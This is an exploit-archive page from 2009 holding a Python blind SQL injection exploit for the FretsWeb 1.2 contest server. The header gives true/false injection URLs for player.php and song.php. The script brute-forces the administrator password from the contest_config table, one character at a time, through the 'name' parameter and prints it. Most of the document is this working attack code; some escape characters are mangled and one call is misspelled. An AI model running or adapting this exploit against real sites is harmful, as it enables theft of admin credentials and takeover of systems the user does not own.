[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FretsWeb 1.2 (name) Remote Blind SQL Injection Exploit
# Published : 2009-06-17
# Author : YEnH4ckEr
# Previous Title : FretsWeb 1.2 Multiple Local File Inclusion Vulnerabilities
# Next Title : phportal 1.0 Insecure Cookie Handling Vulnerability


#!/usr/bin/python
#***********************************************************************************************
#***********************************************************************************************
#**	       										      **
#**  											      **
#**     [] [] []  [][][][>  []     []  [][  ][]     []   [][]]  []  [>  [][][][>  [][][][]    **
#**     || || ||  []        [][]   []   []  []     []   []      [] []   []	  []    []    **
#   [>  [][][][]  [][][][>  [] []  []   []  []   [][]  []       [][]    [][][][>  []    []    **
#**  [-----[]-----[][][][>--[]--[]-[]---[][][]--[]-[]--[]--------[]-----[][][][>--[][][][]--- 
#**==[>    []     []        []   [][]   []  [] [][][]  []       [][]    []           [] []  >>--
#**  [----[[]]----[]--- ----[]-----[]---[]--[]-----[]--[]-------[] []---[]----------[]--[]---/ 
#   [>   [[[]]]   [][][][>  [][]   [] [][[] [[]]  [][]  [][][]  []  [>  [][][][> <][]   []    
#**							                                      **
#**    											      **
#**                           VIVA SPAIN!... GANAREMOS EL MUNDIAL!...o.O                      **
#**					   PROUD TO BE SPANISH!	                              **
#**											      **
#***********************************************************************************************
#***********************************************************************************************
#
#---------------------------------------------------------------------------------------------
#|       	   	     (GET var 'name') BLIND SQL INJECTION EXPLOIT      	             |
#|-------------------------------------------------------------------------------------------|
#|                                    |      FretsWeb 1.2      |		    	     |
#|  CMS INFORMATION:          	      ------------------------	               	             |
#|										             |
#|-->WEB: http://sourceforge.net/projects/fretsweb/			       		     |
#|-->DOWNLOAD: http://sourceforge.net/projects/fretsweb/		                     |
#|-->DEMO: N/A										     |
#|-->CATEGORY: CMS / Games/Entertainment						     |
#|-->DESCRIPTION: Fretsweb is a Contest or Chart Server for Frets on Fire. It...             |
#|		is an improved version of FoFCS.It is meant for...          		     |
#|-->RELEASED: 2009-05-30								     |
#|											     |
#|  CMS VULNERABILITY:									     |
#|											     |
#|-->TESTED ON: firefox 3						                     |
#|-->DORK: N/A									             |
#|-->CATEGORY: BLIND SQLi PYTHON EXPLOIT					             |
#|-->AFFECT VERSION: CURRENT (MAYBE <= ?)				 		     |
#|-->Discovered Bug date: 2009-06-02							     |
#|-->Reported Bug date: 2009-06-02							     |
#|-->Fixed bug date: 2009-06-14								     |
#|-->Info patch: http://sourceforge.net/projects/fretsweb/				     |
#|-->Author: YEnH4ckEr									     |
#|-->mail: y3nh4ck3r[at]gmail[dot]com							     |
#|-->WEB/BLOG: N/A									     |
#|-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.      |
#|-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)		     |
#---------------------------------------------------------------------------------------------
#
#------------
#CONDITIONS:
#------------
#
#magic quotes=OFF
#
#-------
#NEED:
#-------
#
#Valid name
#
#---------------------------------------
#PROOF OF CONCEPT (SQL INJECTION):
#---------------------------------------
#
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/player.php?name=[valid_name]'+AND+1=0%23 --> FALSE
#
#
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=1%23 --> TRUE
#http://[HOST]/[PATH]/song.php?hash=[valid_song]'+and+1=0%23 --> FALSE
#
#--------------
#WATCH VIDEOS
#--------------
#
# BSQLi --> http://www.youtube.com/watch?v=BYrkuAN2ggI
#
# LFI --> http://www.youtube.com/watch?v=LZ8cG_sIHow
#
#
##############################################################################
##############################################################################
##**************************************************************************##
##  SPECIAL THANKS TO: Str0ke and every H4ck3r(all who do milw0rm)!         ##
##**************************************************************************##
##--------------------------------------------------------------------------##
##**************************************************************************##
## GREETZ TO: JosS, Ulises2k, J.McCray, Evil1 and Spanish Hack3Rs community!##
##**************************************************************************##
##############################################################################
##############################################################################
#
#Used modules
import urllib,sys,re,os
#Defined functions
def init():
	if(sys.platform=='win32'):
		os.system("cls")
		os.system ("title FretsWeb 1.2 Blind SQL Injection Exploit")
		os.system ("color 02")
	else:
		os.sytem("clear")
	print "t#######################################################nn"
	print "t#######################################################nn"
	print "t##     FretsWeb 1.2 Blind SQL Injection Exploit      ##nn"
	print "t##       ++Conditions: magic_quotes=OFF              ##nn"
	print "t##       ++Needed: Valid name                        ##nn"
	print "t##               Author: Y3nh4ck3r                   ##nn"
	print "t##      Contact:y3nh4ck3r[at]gmail[dot]com           ##nn"
	print "t##            Proud to be Spanish!                   ##nn"
	print "t#######################################################nn"
	print "t#######################################################nn"
	
def request(urltarget):
	conn=urllib.urlopen(urltarget)
	outcode=conn.read()
	#print outcode #--> Active this line for debugger mode
	return outcode

def error():
	print "t------------------------------------------------------------n"
	print "tWeb isn't vulnerable!nn"
	print "t--->Maybe:nn"
	print "tt1.-Patched.n"
	print "tt2.-Bad path or host.n"
	print "tt3.-Bad name.n"
	print "tt4.-Magic quotes ON.n"
	print "ttEXPLOIT FAILED!n"
	print "t------------------------------------------------------------n"
	sys.exit()

def testedblindsql():
	print "t-----------------------------------------------------------------n"
	print "tWEB MAYBE BE VULNERABLE!nn"
	print "tTested Blind SQL Injection.n"		
	print "tStarting exploit...n"
	print "t-----------------------------------------------------------------nn"

def helper(filename):
	print "nt[!!!] FretsWeb 1.2 Blind SQL Injection Exploitn"
	print "t[!!!] USAGE MODE: [!!!]n"
	print "t[!!!] python "+filename+" [HOST] [PATH] [NAME]n"
	print "t[!!!] [HOST]: Web.n"
	print "t[!!!] [PATH]: Home Path.n"
	print "t[!!!] [NAME]: Name for fishn"
	print "t[!!!] Example: python "+filename+" 'www.example.com' 'demo' 'y3nh4ck3r'n"
	sys.exit()
	
def brute_length(urlrequest):
	#Username length
	flag=1
	i=0
	while(flag==1):
		i=i+1
		blindsql=urlrequest+"'+AND+(SELECT+length(value)+FROM+contest_config+WHERE+name='admin_password')="+str(i)+"%23" #injected code
		output=request(blindsql)
		if(re.search("<title>Fretsweb - Player</title>",output)):
			flag=2
		else:
			flag=1
		#This is the max length of username
		if (i>50):
			error()
		#Save column length
	length=i
	print "t<<<<<--------------------------------------------------------->>>>>n"
	print "tLength catched!n"
	print "tLength Username --> "+str(length)+"n"
	print "tWait several minutes...n"
	print "t<<<<<--------------------------------------------------------->>>>>nn"
	return length
	
def exploiting (lengthvalue,urlrequest):
	#Bruteforcing values
	values=""
	k=1
	z=32
	while((k<=lengthvalue) and (z<=126)):
		blindsql=urlrequest+"'+AND+ascii(substring((SELECT+value+FROM+contest_config+WHERE+name='admin_password'),"+str(k)+",1))="+str(z)+"%23" #injected code
		output=request(blindsql)
		if(re.search("<title>Fretsweb - Player</title>",output)):
			values=values+chr(z)
			k=k+1
			z=32
#new char
		z=z+1 
	return values
#Main
init()
#Init variables
if(len(sys.argv) <= 3):
    helper(sys.argv[0])

host=sys.argv[1]
path=sys.argv[2]
nameforfish=sys.argv[3]
finalrequest="http://"+host+"/"+path+"/player.php?name="+nameforfish
testblind1=finalrequest+"'+AND+1=1%23" #Return true
outcode1=request(testblind1)
testblind2=finalrequest+"'+AND+1=0%23" #Return false
outcode2=request(testblind2)
#Check BSQLi
if(outcode1==outcode2):
	error()
else:
	testedblindsql()
#Catching length of admin password
lengthadmin=brute_length(finalrequest)
#Catching value of password (not hashed)
passwordadmin=exploiting(lengthadmin,finalrequest)
print "ntt*************************************************n"
print "tt*********  EXPLOIT EXECUTED SUCCESSFULLY ********n"
print "tt*************************************************nn"
print "ttAdmin-password: "+passwordadmin+"nn"
print "ntt<<----------------------FINISH!-------------------->>nn"
print "tt<<---------------Thanks to: y3nh4ck3r-------------->>nn"
print "tt<<------------------------EOF---------------------->>nn"
#Check all arguments

# www.Syue.com [2009-06-17]